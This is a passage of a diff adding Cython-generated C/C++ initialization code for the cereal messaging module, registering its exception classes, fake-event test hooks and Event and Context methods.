main_interpreter = current_interpreter; + } else if (unlikely(main_interpreter != current_interpreter)) + #endif + { + PyErr_SetString( + PyExc_ImportError, + "Interpreter change detected - this module can only be loaded into one interpreter per process."); + return -1; + } + return 0; +} +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_SMALL_CODE int __Pyx_copy_spec_to_module(PyObject *spec, PyObject *module, const char* from_name, const char* to_name, int allow_none) +#else +static CYTHON_SMALL_CODE int __Pyx_copy_spec_to_module(PyObject *spec, PyObject *moddict, const char* from_name, const char* to_name, int allow_none) +#endif +{ + PyObject *value = PyObject_GetAttrString(spec, from_name); + int result = 0; + if (likely(value)) { + if (allow_none || value != Py_None) { +#if CYTHON_COMPILING_IN_LIMITED_API + result = PyModule_AddObject(module, to_name, value); +#else + result = PyDict_SetItemString(moddict, to_name, value); +#endif + } + Py_DECREF(value); + } else if (PyErr_ExceptionMatches(PyExc_AttributeError)) { + PyErr_Clear(); + } else { + result = -1; + } + return result; +} +static CYTHON_SMALL_CODE PyObject* __pyx_pymod_create(PyObject *spec, PyModuleDef *def) { + PyObject *module = NULL, *moddict, *modname; + CYTHON_UNUSED_VAR(def); + if (__Pyx_check_single_interpreter()) + return NULL; + if (__pyx_m) + return __Pyx_NewRef(__pyx_m); + modname = PyObject_GetAttrString(spec, "name"); + if (unlikely(!modname)) goto bad; + module = PyModule_NewObject(modname); + Py_DECREF(modname); + if (unlikely(!module)) goto bad; +#if CYTHON_COMPILING_IN_LIMITED_API + moddict = module; +#else + moddict = PyModule_GetDict(module); + if (unlikely(!moddict)) goto bad; +#endif + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "loader", "__loader__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "origin", "__file__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "parent", "__package__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "submodule_search_locations", "__path__", 0) < 0)) goto bad; + return module; +bad: + Py_XDECREF(module); + return NULL; +} + + +static CYTHON_SMALL_CODE int __pyx_pymod_exec_messaging_pyx(PyObject *__pyx_pyinit_module) +#endif +#endif +{ + int stringtab_initialized = 0; + #if CYTHON_USE_MODULE_STATE + int pystate_addmodule_run = 0; + #endif + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + std::string __pyx_t_7; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannyDeclarations + #if CYTHON_PEP489_MULTI_PHASE_INIT + if (__pyx_m) { + if (__pyx_m == __pyx_pyinit_module) return 0; + PyErr_SetString(PyExc_RuntimeError, "Module 'messaging_pyx' has already been imported. Re-initialisation is not supported."); + return -1; + } + #elif PY_MAJOR_VERSION >= 3 + if (__pyx_m) return __Pyx_NewRef(__pyx_m); + #endif + /*--- Module creation code ---*/ + #if CYTHON_PEP489_MULTI_PHASE_INIT + __pyx_m = __pyx_pyinit_module; + Py_INCREF(__pyx_m); + #else + #if PY_MAJOR_VERSION < 3 + __pyx_m = Py_InitModule4("messaging_pyx", __pyx_methods, 0, 0, PYTHON_API_VERSION); Py_XINCREF(__pyx_m); + if (unlikely(!__pyx_m)) __PYX_ERR(0, 1, __pyx_L1_error) + #elif CYTHON_USE_MODULE_STATE + __pyx_t_1 = PyModule_Create(&__pyx_moduledef); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1, __pyx_L1_error) + { + int add_module_result = PyState_AddModule(__pyx_t_1, &__pyx_moduledef); + __pyx_t_1 = 0; /* transfer ownership from __pyx_t_1 to messaging_pyx pseudovariable */ + if (unlikely((add_module_result < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + pystate_addmodule_run = 1; + } + #else + __pyx_m = PyModule_Create(&__pyx_moduledef); + if (unlikely(!__pyx_m)) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #endif + CYTHON_UNUSED_VAR(__pyx_t_1); + __pyx_d = PyModule_GetDict(__pyx_m); if (unlikely(!__pyx_d)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_d); + __pyx_b = PyImport_AddModule(__Pyx_BUILTIN_MODULE_NAME); if (unlikely(!__pyx_b)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_b); + __pyx_cython_runtime = PyImport_AddModule((char *) "cython_runtime"); if (unlikely(!__pyx_cython_runtime)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_cython_runtime); + if (PyObject_SetAttrString(__pyx_m, "__builtins__", __pyx_b) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #if CYTHON_REFNANNY +__Pyx_RefNanny = __Pyx_RefNannyImportAPI("refnanny"); +if (!__Pyx_RefNanny) { + PyErr_Clear(); + __Pyx_RefNanny = __Pyx_RefNannyImportAPI("Cython.Runtime.refnanny"); + if (!__Pyx_RefNanny) + Py_FatalError("failed to import 'refnanny' module"); +} +#endif + __Pyx_RefNannySetupContext("__Pyx_PyMODINIT_FUNC PyInit_messaging_pyx(void)", 0); + if (__Pyx_check_binary_version() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #ifdef __Pxy_PyFrame_Initialize_Offsets + __Pxy_PyFrame_Initialize_Offsets(); + #endif + __pyx_empty_tuple = PyTuple_New(0); if (unlikely(!__pyx_empty_tuple)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_empty_bytes = PyBytes_FromStringAndSize("", 0); if (unlikely(!__pyx_empty_bytes)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_empty_unicode = PyUnicode_FromStringAndSize("", 0); if (unlikely(!__pyx_empty_unicode)) __PYX_ERR(0, 1, __pyx_L1_error) + #ifdef __Pyx_CyFunction_USED + if (__pyx_CyFunction_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_FusedFunction_USED + if (__pyx_FusedFunction_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_Coroutine_USED + if (__pyx_Coroutine_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_Generator_USED + if (__pyx_Generator_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_AsyncGen_USED + if (__pyx_AsyncGen_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_StopAsyncIteration_USED + if (__pyx_StopAsyncIteration_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + /*--- Library function declarations ---*/ + /*--- Threads initialization code ---*/ + #if defined(WITH_THREAD) && PY_VERSION_HEX < 0x030700F0 && defined(__PYX_FORCE_INIT_THREADS) && __PYX_FORCE_INIT_THREADS + PyEval_InitThreads(); + #endif + /*--- Initialize various global constants etc. ---*/ + if (__Pyx_InitConstants() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + stringtab_initialized = 1; + if (__Pyx_InitGlobals() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #if PY_MAJOR_VERSION < 3 && (__PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT) + if (__Pyx_init_sys_getdefaultencoding_params() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + if (__pyx_module_is_main_cereal__messaging__messaging_pyx) { + if (PyObject_SetAttr(__pyx_m, __pyx_n_s_name, __pyx_n_s_main) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + } + #if PY_MAJOR_VERSION >= 3 + { + PyObject *modules = PyImport_GetModuleDict(); if (unlikely(!modules)) __PYX_ERR(0, 1, __pyx_L1_error) + if (!PyDict_GetItemString(modules, "cereal.messaging.messaging_pyx")) { + if (unlikely((PyDict_SetItemString(modules, "cereal.messaging.messaging_pyx", __pyx_m) < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + } + } + #endif + /*--- Builtin init code ---*/ + if (__Pyx_InitCachedBuiltins() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + /*--- Constants init code ---*/ + if (__Pyx_InitCachedConstants() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + /*--- Global type/function init code ---*/ + (void)__Pyx_modinit_global_init_code(); + (void)__Pyx_modinit_variable_export_code(); + (void)__Pyx_modinit_function_export_code(); + if (unlikely((__Pyx_modinit_type_init_code() < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + (void)__Pyx_modinit_type_import_code(); + (void)__Pyx_modinit_variable_import_code(); + (void)__Pyx_modinit_function_import_code(); + /*--- Execution code ---*/ + #if defined(__Pyx_Generator_USED) || defined(__Pyx_Coroutine_USED) + if (__Pyx_patch_abc() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + + /* "cereal/messaging/messaging_pyx.pyx":4 + * # cython: c_string_encoding=ascii, language_level=3 + * + * import sys # <<<<<<<<<<<<<< + * from libcpp.string cimport string + * from libcpp.vector cimport vector + */ + __pyx_t_2 = __Pyx_ImportDottedModule(__pyx_n_s_sys, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 4, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_sys, __pyx_t_2) < 0) __PYX_ERR(0, 4, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "cereal/messaging/messaging_pyx.pyx":21 + * + * + * class MessagingError(Exception): # <<<<<<<<<<<<<< + * def __init__(self, endpoint=None): + * suffix = f"with {endpoint.decode('utf-8')}" if endpoint else "" + */ + __pyx_t_2 = PyTuple_New(1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 21, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_INCREF((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])); + __Pyx_GIVEREF((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])); + PyTuple_SET_ITEM(__pyx_t_2, 0, ((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0]))); + __pyx_t_3 = __Pyx_PEP560_update_bases(__pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 21, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = __Pyx_CalculateMetaclass(NULL, __pyx_t_3); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 21, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = __Pyx_Py3MetaclassPrepare(__pyx_t_4, __pyx_t_3, __pyx_n_s_MessagingError, __pyx_n_s_MessagingError, (PyObject *) NULL, __pyx_n_s_cereal_messaging_messaging_pyx, (PyObject *) NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 21, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + if (__pyx_t_3 != __pyx_t_2) { + if (unlikely((PyDict_SetItemString(__pyx_t_5, "__orig_bases__", __pyx_t_2) < 0))) __PYX_ERR(0, 21, __pyx_L1_error) + } + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = PyList_New(0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 21, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + + /* "cereal/messaging/messaging_pyx.pyx":22 + * + * class MessagingError(Exception): + * def __init__(self, endpoint=None): # <<<<<<<<<<<<<< + * suffix = f"with {endpoint.decode('utf-8')}" if endpoint else "" + * message = f"Messaging failure {suffix}: {strerror(errno.errno).decode('utf-8')}" + */ + __pyx_t_6 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9messaging_13messaging_pyx_14MessagingError_1__init__, 0, __pyx_n_s_MessagingError___init, NULL, __pyx_n_s_cereal_messaging_messaging_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__7)); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 22, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_INCREF(__pyx_t_6); + PyList_Append(__pyx_t_2, __pyx_t_6); + __Pyx_GIVEREF(__pyx_t_6); + __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_6, __pyx_tuple__8); + if (__Pyx_SetNameInClass(__pyx_t_5, __pyx_n_s_init, __pyx_t_6) < 0) __PYX_ERR(0, 22, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + + /* "cereal/messaging/messaging_pyx.pyx":21 + * + * + * class MessagingError(Exception): # <<<<<<<<<<<<<< + * def __init__(self, endpoint=None): + * suffix = f"with {endpoint.decode('utf-8')}" if endpoint else "" + */ + __pyx_t_6 = __Pyx_Py3ClassCreate(__pyx_t_4, __pyx_n_s_MessagingError, __pyx_t_3, __pyx_t_5, NULL, 0, 0); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 21, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + if (__Pyx_CyFunction_InitClassCell(__pyx_t_2, __pyx_t_6) < 0) __PYX_ERR(0, 21, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + if (PyDict_SetItem(__pyx_d, __pyx_n_s_MessagingError, __pyx_t_6) < 0) __PYX_ERR(0, 21, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "cereal/messaging/messaging_pyx.pyx":28 + * + * + * class MultiplePublishersError(MessagingError): # <<<<<<<<<<<<<< + * pass + * + */ + __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_MessagingError); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 28, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = PyTuple_New(1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 28, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_3); + PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_t_3); + __pyx_t_3 = 0; + __pyx_t_3 = __Pyx_PEP560_update_bases(__pyx_t_4); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 28, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_5 = __Pyx_CalculateMetaclass(NULL, __pyx_t_3); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 28, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_6 = __Pyx_Py3MetaclassPrepare(__pyx_t_5, __pyx_t_3, __pyx_n_s_MultiplePublishersError, __pyx_n_s_MultiplePublishersError, (PyObject *) NULL, __pyx_n_s_cereal_messaging_messaging_pyx, (PyObject *) NULL); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 28, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + if (__pyx_t_3 != __pyx_t_4) { + if (unlikely((PyDict_SetItemString(__pyx_t_6, "__orig_bases__", __pyx_t_4) < 0))) __PYX_ERR(0, 28, __pyx_L1_error) + } + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = __Pyx_Py3ClassCreate(__pyx_t_5, __pyx_n_s_MultiplePublishersError, __pyx_t_3, __pyx_t_6, NULL, 0, 0); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 28, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_MultiplePublishersError, __pyx_t_4) < 0) __PYX_ERR(0, 28, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "cereal/messaging/messaging_pyx.pyx":32 + * + * + * def toggle_fake_events(bool enabled): # <<<<<<<<<<<<<< + * cppSocketEventHandle.toggle_fake_events(enabled) + * + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9messaging_13messaging_pyx_1toggle_fake_events, 0, __pyx_n_s_toggle_fake_events, NULL, __pyx_n_s_cereal_messaging_messaging_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__10)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 32, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_toggle_fake_events, __pyx_t_3) < 0) __PYX_ERR(0, 32, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "cereal/messaging/messaging_pyx.pyx":36 + * + * + * def set_fake_prefix(string prefix): # <<<<<<<<<<<<<< + * cppSocketEventHandle.set_fake_prefix(prefix) + * + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9messaging_13messaging_pyx_3set_fake_prefix, 0, __pyx_n_s_set_fake_prefix, NULL, __pyx_n_s_cereal_messaging_messaging_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__12)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 36, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_set_fake_prefix, __pyx_t_3) < 0) __PYX_ERR(0, 36, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "cereal/messaging/messaging_pyx.pyx":40 + * + * + * def get_fake_prefix(): # <<<<<<<<<<<<<< + * return cppSocketEventHandle.fake_prefix() + * + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9messaging_13messaging_pyx_5get_fake_prefix, 0, __pyx_n_s_get_fake_prefix, NULL, __pyx_n_s_cereal_messaging_messaging_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__13)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 40, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_get_fake_prefix, __pyx_t_3) < 0) __PYX_ERR(0, 40, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "cereal/messaging/messaging_pyx.pyx":44 + * + * + * def delete_fake_prefix(): # <<<<<<<<<<<<<< + * cppSocketEventHandle.set_fake_prefix(b"") + * + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9messaging_13messaging_pyx_7delete_fake_prefix, 0, __pyx_n_s_delete_fake_prefix, NULL, __pyx_n_s_cereal_messaging_messaging_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__14)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 44, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_delete_fake_prefix, __pyx_t_3) < 0) __PYX_ERR(0, 44, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "cereal/messaging/messaging_pyx.pyx":48 + * + * + * def wait_for_one_event(list events, int timeout=-1): # <<<<<<<<<<<<<< + * cdef vector[cppEvent] items + * for event in events: + */ + __pyx_t_3 = __Pyx_PyInt_From_int(((int)-1)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 48, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_5 = PyTuple_New(1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 48, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_GIVEREF(__pyx_t_3); + PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_t_3); + __pyx_t_3 = 0; + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9messaging_13messaging_pyx_9wait_for_one_event, 0, __pyx_n_s_wait_for_one_event, NULL, __pyx_n_s_cereal_messaging_messaging_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__16)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 48, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_3, __pyx_t_5); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (PyDict_SetItem(__pyx_d, __pyx_n_s_wait_for_one_event, __pyx_t_3) < 0) __PYX_ERR(0, 48, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "cereal/messaging/messaging_pyx.pyx":64 + * self.event = event + * + * def set(self): # <<<<<<<<<<<<<< + * self.event.set() + * + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9messaging_13messaging_pyx_5Event_3set, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_Event_set, NULL, __pyx_n_s_cereal_messaging_messaging_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__18)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 64, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6cereal_9messaging_13messaging_pyx_Event->tp_dict, __pyx_n_s_set, __pyx_t_3) < 0) __PYX_ERR(0, 64, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + PyType_Modified(__pyx_ptype_6cereal_9messaging_13messaging_pyx_Event); + + /* "cereal/messaging/messaging_pyx.pyx":67 + * self.event.set() + * + * def clear(self): # <<<<<<<<<<<<<< + * return self.event.clear() + * + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9messaging_13messaging_pyx_5Event_5clear, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_Event_clear, NULL, __pyx_n_s_cereal_messaging_messaging_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__19)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 67, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6cereal_9messaging_13messaging_pyx_Event->tp_dict, __pyx_n_s_clear, __pyx_t_3) < 0) __PYX_ERR(0, 67, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + PyType_Modified(__pyx_ptype_6cereal_9messaging_13messaging_pyx_Event); + + /* "cereal/messaging/messaging_pyx.pyx":70 + * return self.event.clear() + * + * def wait(self, int timeout=-1): # <<<<<<<<<<<<<< + * self.event.wait(timeout) + * + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9messaging_13messaging_pyx_5Event_7wait, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_Event_wait, NULL, __pyx_n_s_cereal_messaging_messaging_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__21)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 70, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_3, __pyx_tuple__22); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6cereal_9messaging_13messaging_pyx_Event->tp_dict, __pyx_n_s_wait, __pyx_t_3) < 0) __PYX_ERR(0, 70, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + PyType_Modified(__pyx_ptype_6cereal_9messaging_13messaging_pyx_Event); + + /* "cereal/messaging/messaging_pyx.pyx":73 + * self.event.wait(timeout) + * + * def peek(self): # <<<<<<<<<<<<<< + * return self.event.peek() + * + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9messaging_13messaging_pyx_5Event_9peek, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_Event_peek, NULL, __pyx_n_s_cereal_messaging_messaging_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__23)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 73, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6cereal_9messaging_13messaging_pyx_Event->tp_dict, __pyx_n_s_peek, __pyx_t_3) < 0) __PYX_ERR(0, 73, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + PyType_Modified(__pyx_ptype_6cereal_9messaging_13messaging_pyx_Event); + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9messaging_13messaging_pyx_5Event_11__reduce_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_Event___reduce_cython, NULL, __pyx_n_s_cereal_messaging_messaging_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__24)); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_reduce_cython, __pyx_t_3) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9messaging_13messaging_pyx_5Event_13__setstate_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_Event___setstate_cython, NULL, __pyx_n_s_cereal_messaging_messaging_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__26)); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_setstate_cython, __pyx_t_3) < 0) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_5__reduce_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_SocketEventHandle___reduce_cytho, NULL, __pyx_n_s_cereal_messaging_messaging_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__27)); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_reduce_cython, __pyx_t_3) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_7__setstate_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_SocketEventHandle___setstate_cyt, NULL, __pyx_n_s_cereal_messaging_messaging_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__28)); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_setstate_cython, __pyx_t_3) < 0) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "cereal/messaging/messaging_pyx.pyx":123 + * self.context = cppContext.create() + * + * def term(self): # <<<<<<<<<<<<<< + * del self.context + * self.context = NULL + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9messaging_13messaging_pyx_7Context_3term, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_Context_term, NULL, __pyx_n_s_cereal_messaging_messaging_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__29)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 123, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6cereal_9messaging_13messaging_pyx_Context->tp_dict, __pyx_n_s_term, __pyx_t_3) < 0) __PYX_ERR(0, 123, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + PyType_Modified(__pyx_ptype_6cereal_9messaging_13messaging_pyx_Context); + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9messaging_13messaging_pyx_7Context_7__reduce_cython__, 